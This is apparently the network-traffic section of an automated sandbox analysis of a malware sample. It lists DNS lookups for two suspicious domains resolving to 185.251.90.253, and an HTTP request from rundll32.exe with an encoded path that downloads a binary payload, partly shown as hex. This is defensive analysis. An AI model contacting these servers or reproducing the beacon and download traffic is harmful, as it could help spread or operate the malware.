                                                      Sep 10, 2021 07:02:19.167815924 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167859077 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167860031 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167897940 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167937040 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167953014 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167975903 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.168013096 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.211937904 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.216938972 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.216978073 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217015028 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217062950 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217107058 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217144012 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217183113 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217205048 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217221022 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217242002 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217257977 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217297077 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217329025 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217334986 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217371941 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217384100 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217427969 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217464924 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217490911 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217503071 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217541933 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217561007 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217578888 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217617989 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217658043 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217664003 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217717886 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217727900 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217775106 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217812061 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217830896 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217849970 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217880964 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217889071 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217926025 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217962980 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217967987 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217998981 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218045950 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218080044 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218091011 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218128920 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218154907 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218168020 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218205929 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218223095 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218241930 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218280077 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218302011 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218317986 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218367100 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218370914 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218410015 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218446970 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218478918 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218485117 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218523979 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218550920 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218559980 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218597889 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218635082 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218641043 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218682051 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218724012 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218724966 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218764067 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218785048 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218802929 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218861103 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.258869886 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.261038065 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.261089087 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.261251926 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.267929077 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.267976046 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268013954 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268053055 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268090963 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268106937 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.268138885 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268182993 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268218994 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268239021 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.268264055 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268305063 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268313885 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.268342972 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268357038 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.268383026 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268421888 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268428087 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.268470049 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268479109 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.268513918 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268533945 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.268552065 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268590927 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268627882 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268627882 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.268665075 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268702984 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.268703938 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268831968 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.269946098 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.319003105 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.542692900 CEST4979280192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.593074083 CEST8049792185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.593410015 CEST4979280192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.594026089 CEST4979280192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.683265924 CEST8049792185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:20.036945105 CEST8049792185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:20.037009001 CEST8049792185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:20.037101984 CEST4979280192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:20.037229061 CEST4979280192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:20.085498095 CEST8049792185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:44.176873922 CEST4979380192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:44.225534916 CEST8049793185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:44.225804090 CEST4979380192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:44.225999117 CEST4979380192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:44.318419933 CEST8049793185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:44.743824005 CEST8049793185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:44.744118929 CEST4979380192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:44.744160891 CEST4979380192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:44.792793989 CEST8049793185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:45.061700106 CEST4979480192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:45.111363888 CEST8049794185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:45.111488104 CEST4979480192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:45.111639977 CEST4979480192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:45.111676931 CEST4979480192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:45.160449028 CEST8049794185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:45.626944065 CEST8049794185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:45.627057076 CEST4979480192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:45.627099037 CEST4979480192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:45.675847054 CEST8049794185.251.90.253192.168.2.3

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 10, 2021 06:58:56.121263981 CEST5128153192.168.2.38.8.8.8
                                                      Sep 10, 2021 06:58:56.155267954 CEST53512818.8.8.8192.168.2.3
                                                      Sep 10, 2021 06:59:26.056675911 CEST4919953192.168.2.38.8.8.8
                                                      Sep 10, 2021 06:59:26.102828026 CEST53491998.8.8.8192.168.2.3
                                                      Sep 10, 2021 06:59:28.654618979 CEST5062053192.168.2.38.8.8.8
                                                      Sep 10, 2021 06:59:28.690020084 CEST53506208.8.8.8192.168.2.3
                                                      Sep 10, 2021 06:59:43.559597015 CEST6493853192.168.2.38.8.8.8
                                                      Sep 10, 2021 06:59:43.608477116 CEST53649388.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:00:03.792146921 CEST6015253192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:00:03.843646049 CEST53601528.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:00:07.584683895 CEST5754453192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:00:07.623425961 CEST53575448.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:00:38.525141954 CEST5598453192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:00:38.560905933 CEST53559848.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:00:40.321507931 CEST6418553192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:00:40.356035948 CEST53641858.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:01:43.125859022 CEST6511053192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:01:43.186038017 CEST53651108.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:01:43.723721027 CEST5836153192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:01:43.803010941 CEST53583618.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:01:44.219594002 CEST6349253192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:01:44.255074024 CEST53634928.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:01:44.599225998 CEST6083153192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:01:44.632458925 CEST53608318.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:01:45.170583010 CEST6010053192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:01:45.203511000 CEST53601008.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:01:45.704351902 CEST5319553192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:01:45.740082979 CEST53531958.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:01:46.592710972 CEST5014153192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:01:46.620439053 CEST53501418.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:01:50.859266996 CEST5302353192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:01:50.894953012 CEST53530238.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:01:51.742891073 CEST4956353192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:01:51.779105902 CEST53495638.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:01:52.136792898 CEST5135253192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:01:52.169866085 CEST53513528.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:02:17.167288065 CEST5934953192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:02:17.487325907 CEST53593498.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:02:18.455923080 CEST5708453192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:02:18.489656925 CEST53570848.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:02:19.504143000 CEST5882353192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:02:19.540473938 CEST53588238.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:02:43.529391050 CEST5756853192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:02:43.557179928 CEST53575688.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:02:43.832326889 CEST5054053192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:02:44.172904015 CEST53505408.8.8.8192.168.2.3
                                                      Sep 10, 2021 07:02:44.751022100 CEST5436653192.168.2.38.8.8.8
                                                      Sep 10, 2021 07:02:45.060425043 CEST53543668.8.8.8192.168.2.3

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Sep 10, 2021 07:02:17.167288065 CEST192.168.2.38.8.8.80xeeb0Standard query (0)atl.bigbigpoppa.comA (IP address)IN (0x0001)
                                                      Sep 10, 2021 07:02:18.455923080 CEST192.168.2.38.8.8.80xf9e9Standard query (0)atl.bigbigpoppa.comA (IP address)IN (0x0001)
                                                      Sep 10, 2021 07:02:19.504143000 CEST192.168.2.38.8.8.80x62eaStandard query (0)atl.bigbigpoppa.comA (IP address)IN (0x0001)
                                                      Sep 10, 2021 07:02:43.529391050 CEST192.168.2.38.8.8.80xd36dStandard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                      Sep 10, 2021 07:02:43.832326889 CEST192.168.2.38.8.8.80xcca7Standard query (0)art.microsoftsofymicrosoftsoft.atA (IP address)IN (0x0001)
                                                      Sep 10, 2021 07:02:44.751022100 CEST192.168.2.38.8.8.80x2a20Standard query (0)art.microsoftsofymicrosoftsoft.atA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Sep 10, 2021 07:02:17.487325907 CEST8.8.8.8192.168.2.30xeeb0No error (0)atl.bigbigpoppa.com185.251.90.253A (IP address)IN (0x0001)
                                                      Sep 10, 2021 07:02:18.489656925 CEST8.8.8.8192.168.2.30xf9e9No error (0)atl.bigbigpoppa.com185.251.90.253A (IP address)IN (0x0001)
                                                      Sep 10, 2021 07:02:19.540473938 CEST8.8.8.8192.168.2.30x62eaNo error (0)atl.bigbigpoppa.com185.251.90.253A (IP address)IN (0x0001)
                                                      Sep 10, 2021 07:02:43.557179928 CEST8.8.8.8192.168.2.30xd36dNo error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                      Sep 10, 2021 07:02:44.172904015 CEST8.8.8.8192.168.2.30xcca7No error (0)art.microsoftsofymicrosoftsoft.at185.251.90.253A (IP address)IN (0x0001)
                                                      Sep 10, 2021 07:02:45.060425043 CEST8.8.8.8192.168.2.30x2a20No error (0)art.microsoftsofymicrosoftsoft.at185.251.90.253A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • atl.bigbigpoppa.com
                                                      • art.microsoftsofymicrosoftsoft.at

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.349790185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Sep 10, 2021 07:02:17.572803020 CEST5265OUTGET /NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu HTTP/1.1
                                                      Cache-Control: no-cache
                                                      Connection: Keep-Alive
                                                      Pragma: no-cache
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                      Host: atl.bigbigpoppa.com
                                                      Sep 10, 2021 07:02:18.024907112 CEST5267INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 10 Sep 2021 05:02:17 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 194718
                                                      Connection: close
                                                      Pragma: public
                                                      Accept-Ranges: bytes
                                                      Expires: 0
                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                      Content-Disposition: inline; filename="613ae6d9f31b9.bin"
                                                      Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                      X-Content-Type-Options: nosniff
                                                      Data Raw: 76 74 cf a8 dc 9e a3 bd 80 c4 22 74 d6 90 04 f4 7c 4e 89 f9 f5 f6 c3 41 5b bd 9a c1 75 03 9e 3d 57 c7 97 06 3e 33 1a 75 cb d2 f3 9b 82 f7 12 da 1b 73 aa 9d 83 1c 06 cc d0 bb fa 6b fe fc 69 45 21 fd 77 4d e8 65 62 93 d4 4f 54 c0 7f 4b c0 e8 bd 0a da 21 85 09 52 e0 63 30 82 6b 84 0b a5 73 0e d8 b6 0a 2f f6 82 b8 db 3a 51 f5 d1 6c 17 f8 66 f5 63 27 a8 2c fe 79 31 d3 11 a2 68 ab eb bd c6 ca 96 b7 df 24 d9 bb eb 81 ee 0f 54 d0 24 37 17 2e bd d0 90 a9 1c c7 0d aa a5 e0 95 ad 52 e0 75 84 91 a6 10 9d 81 0a 4d b4 ff 81 97 74 92 63 92 3b ae a9 ad cf 50 57 12 53 8f 24 c5 3c d5 ff c4 5c 06 b9 e4 02 71 34 b3 6a f5 02 c6 06 6d 8c 5a b2 93 69 e3 04 8d c3 27 8a b8 c8 4a 1d cd c2 0f bd 3f 7e 06 be 38 ae a8 33 f4 46 25 b7 42 e8 60 df af 0a cb 9a 44 a1 2f 47 30 4b a6 62 22 1a 9b 17 41 04 1f fe a9 a5 c2 5f 2c b8 17 b3 7e f8 a3 b1 19 c2 e2 ac 4f 23 9a 3a 3a bf c4 61 f5 b6 7d d8 d5 41 f7 c6 7d 13 a3 25 bd bd b7 45 09 64 a8 d5 8a 6a 6e 18 90 f8 15 29 9d ad e6 f7 81 c6 c1 6d 32 c6 6d 91 e1 d5 b2 11 af d7 0f ae c5 84 22 1e 0f 3d 2a 0d 19 79 94 9f 72 e4 19 30 54 53 f8 a0 51 28 95 77 e8 05 cd 58 f3 5e 79 1b 2d 75 16 31 f4 ea 58 42 da fe ad 9f 21 09 f9 67 69 cf ff c7 a6 bd 34 2a ef 9a e2 63 bf 8b 7d 44 e0 80 ea 5d fb 18 21 db 02 cf db ca 07 81 b4 3e 7a 72 00 1b 21 ff 30 31 fa d2 ce c6 9f 33 9a cd 1a 25 3c f7 05 4d c2 77 5e 4f fc 99 c8 f0 51 93 7e e9 b2 35 93 c2 cc 3e bd 22 41 3e a6 14 a2 f9 47 45 a0 94 00 2b c8 09 2c 57 1c 70 d1 fc 8b 98 bd a9 53 f3 48 aa d4 87 c8 34 d1 84 66 95 bf 45 78 59 ad 24 31 f2 22 9f 83 2e 85 ee f9 50 21 68 9f ec 2e 0f 0a 37 cc a4 dc 12 79 1e 10 12 9d 19 93 bc cf 36 df 7c 6f 25 8f bc 3a 4c 53 73 0d ae 15 56 83 9e fa 88 d5 7f 9b ee e9 dc ff 92 38 f9 91 3c bf b0 a9 0d 4a 43 73 58 68 19 46 a8 b0 e3 17 3d 9c 68 30 37 f6 84 d2 c7 37 01 33 97 44 91 e5 20 3f a7 d9 e3 c0 af b0 2a 54 8f ef ab aa 06 35 5f 5b c2 66 54 41 fd bb d8 8a 29 80 3d 5d d0 8d 84 9f 53 68 db f0 5a 42 de 57 66 fa 72 b7 72 97 f3 0f 0d 65 28 85 1c 27 e4 ff f8 ed 8c 53 c2 a4 9a ad fe 7d c9 57 1e f2 ae f2 d6 35 08 89 64 bd 41 a1 00 d8 bb 74 05 14 0c 5e ca 85 87 26 07 a5 14 0f 34 11 c2 c5 18 a1 ed ce fd da 89 22 fb f0 a7 a2 50 4a 11 f6 48 c3 b2 8a f3 91 ca 09 4a d9 01 f7 fb 10 4d a4 ed cd 67 f7 fa bf df 33 2d 23 30 89 ba 79 e8 a3 8e 23 56 d9 30 2e 33 d2 7b 11 d1 09 3f 4a 40 d9 21 e7 c3 99 10 06 48 49 e6 26 34 2f c8 84 6f b9 66 4b 96 6e 4d 8a 42 85 99 f6 5f 76 29 de 4e c0 fb 1d 3a 19 52 46 73 7a 7f e9 46 b5 05 4b 3e 44 54 27 2b d1 39 05 34 e3 7e 5b e3 e8 52 d3 26 d5 f4 0e c9 1e 3e 6f 47 1f 11 ed 46 0f 00 f0 d5 53 bd 47 1f 3e ad 02 09 9b 96 3d ce 9d cc 58 7d 5e 62 8b 69 88 05 00 61 0d b0 69 2c da a1 ec e0 02 19 38 28 c5 c3 c1 00 80 82 e8 27 0d 0c 48 62 cf b4 e4 fb fa 1e 90 42 0e d8 9a 95 7b f2 ae 5f f6 77 d3 ea f5 b8 f3 4e 21 a0 bc 9b e0 df 6e 4c 75 0c 36
                                                      Data Ascii: vt"t|NA[u=W>3uskiE!wMebOTK!Rc0ks/:Qlfc',y1h$T$7.RuMtc;PWS$<\q4jmZi'J?~83F%B`D/G0Kb"A_,~O#::a}A}%Edjn)m2m"=*yr0TSQ(wX^y-u1XB!gi4*c}D]!>zr!013%<Mw^OQ~5>"A>GE+,WpSH4fExY$1".P!h.7y6|o%:LSsV8<JCsXhF=h0773D ?*T5_[fTA)=]ShZBWfrre('S}W5dAt^&4"PJHJMg3-#0y#V0.3{?J@!HI&4/ofKnMB_v)N:RFszFK>DT'+94~[R&>oGFSG>=X}^biai,8('HbB{_wN!nLu6
                                                      Sep 10, 2021 07:02:18.024929047 CEST5268INData Raw: 90 ae a9 f4 a8 ef be ce 22 ff 51 86 25 9b 45 49 f6 38 ab a0 17 81 da 96 40 7d 79 7c 81 b0 00 b6 32 cd 25 c7 b2 a3 9e e3 ed b9 d6 f1 15 6f 3e 2f c2 02 d6 80 08 1d fa e8 27 17 98 17 96 c4 37 0a 68 eb 2f ae b2 81 13 08 6b c6 f2 d0 8b 5f 7e 09 9a 08
                                                      Data Ascii: "Q%EI8@}y|2%o>/'7h/k_~0*wAZ]EC2 >3&{i+: |{65z"=*8TxOkt,GM)'Ju_cJ:`zyuE]\6UTO?UE_~'
                                                      Sep 10, 2021 07:02:18.024943113 CEST5269INData Raw: b8 c2 31 4b 94 90 26 a0 e4 26 12 84 c1 9b 09 25 61 fe a0 fd 91 bf a7 1a 26 94 b9 5b 6b 55 b4 f6 ea 62 0c c5 04 75 97 20 b2 b5 66 87 2f ca a7 92 60 2c 21 84 a7 23 e1 a8 fc f7 21 29 ac 5e c2 aa f8 41 99 f8 90 d7 e3 16 e1 88 2e d0 99 61 d2 30 f4 8f
                                                      Data Ascii: 1K&&%a&[kUbu f/`,!#!)^A.a0vS4O=U }2w`zuD~!SU~JA{7UZb@'VpGaDMWUZ)ypc4fH"LocY9L
                                                      Sep 10, 2021 07:02:18.024957895 CEST5271INData Raw: 8f 66 14 26 6f 0a 4c 7c 7d 3b 07 77 37 85 e5 2f eb 55 0a 37 fc 6c d5 08 f9 ca 66 39 c2 a8 e3 90 49 b9 2c 73 eb 2b f0 b0 b3 06 ac bb 49 5e 6d 49 ee fd c3 dd 83 df 48 eb fc 27 f5 1e f8 88 2c 14 1a d2 f4 9b 16 04 f1 33 a5 8b 28 c5 ed 91 ed 92 85 22
                                                      Data Ascii: f&oL|};w7/U7lf9I,s+I^mIH',3("5yoq9k'oHZ^f4)E{c#:3)UTJ[IrbhMjQYWFx&M]c<KeKD"+L]*h?R@#O.8
                                                      Sep 10, 2021 07:02:18.024972916 CEST5272INData Raw: f6 42 92 7c 54 91 1b dc b2 de d8 a3 dc d6 88 e3 9c 7c 48 e7 1d f1 4c c5 33 a3 de 0b 0a 7a e9 48 f4 64 75 e9 e3 5b 85 c6 a9 56 bb 6c 9e 03 c5 94 ba a5 f0 aa 2d fe c3 d8 ab 6b c9 be 75 48 5d ca f7 05 fc e7 84 a2 d8 39 fb b2 69 11 6b dc 9d 5a eb 4e
                                                      Data Ascii: B|T|HL3zHdu[Vl-kuH]9ikZNW2dpRbM*HI4uy>Yd6kr>3?^h2_ZyX#dJ>3+*Xz;/MQVR,)`K9usZDzR5a4iXYiu!
                                                      Sep 10, 2021 07:02:18.024991035 CEST5273INData Raw: 13 95 39 69 f7 3d 42 4d f2 85 6d 98 78 cd dd 3c dc 7b cc a6 dc 90 b4 bd 1a c9 1e 1a 9e ba 0f 08 85 83 71 08 ab 06 0c c0 db 07 19 ba 49 f5 13 bc 48 4f 9d cc 7b f3 3b 1e 78 fb 1a 99 c7 04 4b db 4d 65 07 b1 a8 89 d1 1d a7 b1 22 83 91 46 a3 eb 4b 09
                                                      Data Ascii: 9i=BMmx<{qIHO{;xKMe"FKd\wc|;HUQQ$@9!(JZE~d/E.*3ad#{u:DNj>yOh@ac"#8/Ub!"7yzvI['xC{HOsmZ+
